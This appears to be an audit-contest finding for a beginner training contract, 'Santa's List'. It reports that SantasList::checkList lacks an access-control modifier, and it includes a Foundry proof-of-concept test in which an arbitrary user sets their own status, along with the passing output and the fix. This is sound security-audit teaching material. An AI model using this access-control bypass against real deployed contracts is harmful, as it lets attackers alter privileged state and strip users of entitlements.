First Flight #5: Santa's List
First Flight #5
Beginner FriendlyFoundry
100 EXP
View results
Previous Next
Submission Details
Severity: high
Valid

Missing Validation on `SantasList::checkList` allows random address to set status

wafflemakr

Summary

Missing Validation on SantasList::checkList allows random address to set status

Vulnerability Details

SantasList::checkList is missing the onlySanta modifier, allowing any malicious users to set status for a random person. Additionally, people that already have the NICE and EXTRA_NICE status, can be updated to NAUGHTY, removing their rights to collect and buy presents.

PoC

function testRandomAddressCheckOne() public {
// any user can call check list, apart from santa
vm.expectEmit(false, false, false, true);
emit CheckedOnce(user, SantasList.Status.EXTRA_NICE);
vm.prank(user);
santasList.checkList(user, SantasList.Status.EXTRA_NICE);
// check status
assertTrue(santasList.getNaughtyOrNiceOnce(user) == SantasList.Status.EXTRA_NICE);
}

Output:

forge test --mt testRandomAddressCheckOne
[⠒] Compiling...
No files changed, compilation skipped
Running 1 test for test/unit/SantasListTest.t.sol:SantasListTest
[PASS] testRandomAddressCheckOne() (gas: 37854)
Test result: ok. 1 passed; 0 failed; 0 skipped; finished in 2.32ms

Impact

HIGH. Breaks protocol goals.

Tools Used

  • Manual Review

Recommendations

Add onlySanta modifier to SantasList::checkList.

Updates

Lead Judging Commences

inallhonesty Lead Judge almost 2 years ago
Submission Judgement Published
Validated
Assigned finding tags:

Access Control on checkList()

Anyone is able to call checkList() changing the status of a provided address. This is not intended functionality and is meant to be callable by only Santa.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.